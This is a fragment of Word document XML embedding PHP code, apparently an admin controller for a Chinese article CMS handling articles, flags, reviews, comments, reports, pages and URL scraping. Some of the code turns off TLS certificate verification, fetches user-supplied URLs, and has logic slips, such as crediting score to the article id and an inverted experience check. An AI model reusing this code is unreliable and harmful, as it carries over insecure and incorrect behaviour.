          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BFA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F47E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9C48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$post['create_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D924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$db=Db::name('article')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA55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915A5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4E89DF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A583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45893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F2A8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442FCD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$db=Db::name('article')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF13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6CA8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23C9AF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B5BA3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55A76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7DB9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436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08106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0D852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$name=Db::name('article')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2C5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31F93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41EC0A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749A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F601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5DE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E554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8E916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23AE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0DB9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220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add1(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63E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$url=url('article/add',['mychannel'=&gt;'1','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD5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$this-&gt;redirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C9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CFF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add2(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D62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$url=url('article/add',['mychannel'=&gt;'2','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C6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$this-&gt;redirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5808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39A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add3(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF5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$url=url('article/add',['mychannel'=&gt;'3','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6E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$this-&gt;redirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503F1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4FFD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add4(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3E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$url=url('article/add',['mychannel'=&gt;'4','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B9D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$this-&gt;redirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F456F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D03F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612A87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79B84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$id=input('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642873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EDD1D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$db=Db::name('article')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CA5B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536BB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1FCC43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A3464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470BA6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4F5AB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FB9C9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15675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8639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D5C57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0AA62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EE88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10A56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B20C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desAll(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D857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5363A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5C8003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foreach($_POST['des'] as $k =&gt; $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3617BC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intval($k);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B8E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intval($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B6A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Db::name('article')-&gt;where('id',$id)-&gt;setField('des',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C26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FFF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更新排序成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AB67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59FCB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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4FED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65C9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AFF4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FBA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delAll(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270425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515C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F50CE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if(input('?post.delAll')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1EB1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$post=$post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768331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$db=Db::name('article')-&gt;delete($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B2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04A5D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5FFAF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921E7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64B15D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5D4D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D75B1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删除失败，未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1734F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7DBA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3681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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74F9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91A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32D25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F320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all(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4380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7A147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$post=input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B9A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6488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if(input('?post.delAll')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DA5B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$post=$post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF56D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088820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($post as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E44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if($type=='del'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081D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$db-&gt;delete($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CE4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54E94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$db-&gt;where('id',$v)-&gt;setField('hide',$type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529FB2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8D8B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295C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5C358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12190C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5FBF0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0D4638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F1F3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204D7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删除失败，未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDDED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F4FD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BAC87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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D49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FB6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A02B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30E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flags(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315FF0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$data=Db::name('flags')-&gt;order('id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4897DF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56E3F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19850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59F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flags_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF90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594FF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01E42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3E967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7C415F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730AB3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$post['update_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A3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442D5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$titledb=Db::name('flags')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7464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5B38CE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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4BF1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7F1C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$post['create_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874F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$db=Db::name('flags')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B729A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6AB05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2A0269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99F69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339E4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99B67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39DA1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$db=Db::name('flags')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D8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if($db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A880A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700A2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1C64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3E2D19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2B1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55FC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8D0E6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$data=["err"=&gt;'post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512B3B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850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5ADC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5D7FF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$name=Db::name('flags')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B74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4773D3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417AE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2D0EC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410EA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0C3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E6E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CFAFF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2F5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7CB8F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5562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flagsDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C028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73E5A9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CA74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48EB02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ACC2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$admin=Db::name('article')-&gt;where('flags',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05954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if(!$admin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E66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$db=Db::name('flags')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268CEA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6FAFA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6563A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B86A1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36F18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B55D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AC7C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属性下有文章，请先删除文章对应属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D817E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ED98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51309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661AE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7512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253CB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03B8E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D01C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8E3BA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735E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6BEA42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51838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 ? input('id'): '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4BC5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 ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2A8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$text=['0'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;','1'=&gt;'&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/font&gt;','2'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','3'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C4C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4847F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$aritlce=Db::name('article')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20ED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if($aritlce['uid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F43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if($type==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721ED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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>管理员设置隐藏状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FE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if($type==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8FA0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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FE87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if($type==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A6C2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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>管理员设置审核状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8432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9297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D056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if($aritlce['uid'] &amp;&amp; $type==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48908A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$data=DB::name('member_config')-&gt;where("name='articleAdd' or name='articleHide' or name='articleScore' or name='articleNum' or name='articleCode' or name='articleJingyan' or name='articleMoney'")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C18C1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$articleAdd=$data['0']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4B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$articleHide=$data['1']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712636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$articleScore=$data['2']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6216C3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$articleNum=$data['3']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E613F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$articleCode=$data['4']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE7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$articleJingyan=$data['5']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD30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$articleMoney=$data['6']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0E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4C772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if($articleMoney){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12560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$aritlcejiance=Db::name('member_records')-&gt;where(['type'=&gt;'money','text'=&gt;'</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'.$aritlce['id'],'data'=&gt;'+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F4E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if(!$aritlcejiance){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE17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'.$aritlce['id'],$articleMoney,'money','+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55D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Db::name('member')-&gt;where('id',$aritlce['uid'])-&gt;setInc('money',$articleMoney);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F44C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2BA8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E0C1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if($articleScore){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C601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$aritlcejiance=Db::name('member_records')-&gt;where(['type'=&gt;'score','text'=&gt;'</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'.$aritlce['id'],'data'=&gt;'+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E3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if(!$aritlcejiance){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6677B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'.$aritlce['id'],$articleScore,'score','+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191738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Db::name('member')-&gt;where('id',$aritlce['id'])-&gt;setInc('score',$articleScore);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0B9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460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85B2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if($articleJingyan){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BAC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$aritlcejiance=Db::name('member_records')-&gt;where(['type'=&gt;'jingyan','text'=&gt;'</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lastRenderedPageBreak/>
        <w:t>'.$aritlce['id'],'data'=&gt;'+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC21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if(!$articleJingyan){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F12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'.$aritlce['id'],$articleJingyan,'jingyan','+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE2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Db::name('member')-&gt;where('id',$this-&gt;member['id'])-&gt;setInc('jingyan',$articleJingyan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D591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4DD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54FB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'.$aritlce['id'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71388A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1332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$db=Db::name('article')-&gt;where('id',$aritlce['id'])-&gt;setField('hide',$type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43992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53EBF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$data=[$text[$type]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33396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CDB30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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDBD5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FA4F3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615E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$data=['GET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329742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D9D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320E1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提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F663B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F3B2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3146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F3D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review(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087EB6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$map['hide']=['in','2,3'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025E0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$data=Db::name('article')-&gt;where($map)-&gt;order('des desc,id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482CF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0DE81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7309C8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$this-&gt;assign('page',$page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596975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DBC86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4923B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79119B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$data=Db::name('article_ping')-&gt;order('id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B3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1988FE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378775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2AF65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DD205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325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pingAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC80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2BCF7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21C2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1E15D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$db=Db::name('article')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464817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6C986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0C3332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31458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5E9C5A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4B50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763F6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0E29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1135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$name=Db::name('article_ping')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D4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$article=Db::name('article')-&gt;where('id',$name['aid'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442722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$pingList=Db::name('article_ping_xia')-&gt;where('ping_id',$id)-&gt;order('id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E9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$pingList-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D74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57CC3E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518FD4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$this-&gt;assign('article',$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA5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0D6FEC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$this-&gt;assign('pingList',$pingList);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C863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79045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4D58E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C87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4D9C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417512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48FE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25886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3F4F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pingDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD9FF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22C94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23502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50A5E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$db=Db::name('article_ping')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E02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6C6F4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49A953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FE9D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48928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8553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7D4A6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3FDA7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0CE2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A529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0EA22D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B1E5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9AE09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BDDF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pingXaiDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33422D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0CD495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527EA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F9B2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$db=Db::name('article_ping_xia')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F695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6E7F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6D1EB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1866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762A5F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2AA9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A6F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4A86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B3A87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F5E04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4E55F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8B7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86E44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592F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jubao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D896E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$data=Db::name('jubao')-&gt;order('id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68D1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5C417F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57C4D8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35C288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2FCCF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AF6D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jubaoHuifu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF4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F7392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6FC6C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$content=input('content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371289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D3432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$db=Db::name('jubao')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368FB1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193D9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$adminId=Session::get('admin','ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C72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$where['uid']=$db['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E636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$where['aid']=$db['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628E8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$where['content']=$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6BB6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$where['time']=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142B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$where['admin_id']=$adminId['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37234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$db=Db::name('jubao')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7844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6F4E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回复成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4767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A62D3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回复失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C582D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D5E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279E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1FEB0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12D583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193F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7AD0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4B4C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21D2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79846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C7AC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jubaoDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523BC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A0CFC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F4393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1E8958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$db=Db::name('jubao')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162118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EBF5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5E0E8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E7E00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72EAB2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0CD96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5A086F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10B42C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221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60B11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1B2BD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241B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150F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C52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page(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778437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$data=Db::name('page')-&gt;order('id asc,des desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265836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213FBE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57062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7CB6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pageAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426E8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243955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6951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60AB23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207A4F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if($post['title']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F470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$titledb=Db::name('page')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C8B1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353FF3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文章标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71624F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94EA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EA12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$db=Db::name('page')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C26C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5C5D8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720137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3BF62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503CE6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B58FD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30044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$db=Db::name('page')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F26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A9D66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736452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AB3BB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0C3ACE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187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EBCC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4169D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2969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$name=Db::name('page')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77263A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1090E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2221C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5EF5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ADC36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186F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6D64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58C549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B249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9B55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1A5B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private function get($url,$json=false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A426F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$arrContextOptions=array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB2E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"ssl"=&gt;array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E292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"verify_peer"=&gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131344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"verify_peer_name"=&gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65443C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E41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9B981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$html=file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB376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if($json){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC68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$html=json_decode($html,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB2D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EFC2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01BA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64DB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qiniu($url,$type=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48416E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if(!$url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112BE4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5BF45D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B465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4BB12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$type='.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B8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79EB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1D5ECD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590664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653F1B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411753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36E011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$bmgr = new BucketManager($auth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D117D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33197D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md5($url.rand(11111,999999)) .$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F79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$bmgr-&gt;fetch($url, $bucket, $key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12CA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54F4BC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4BFD2D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ACEB1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$key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768A98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015E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9C95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caiji(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732556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input('_url');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C71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if(!$url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D478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请输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19D3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DDCB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w:t>
      </w:r>
    </w:p>
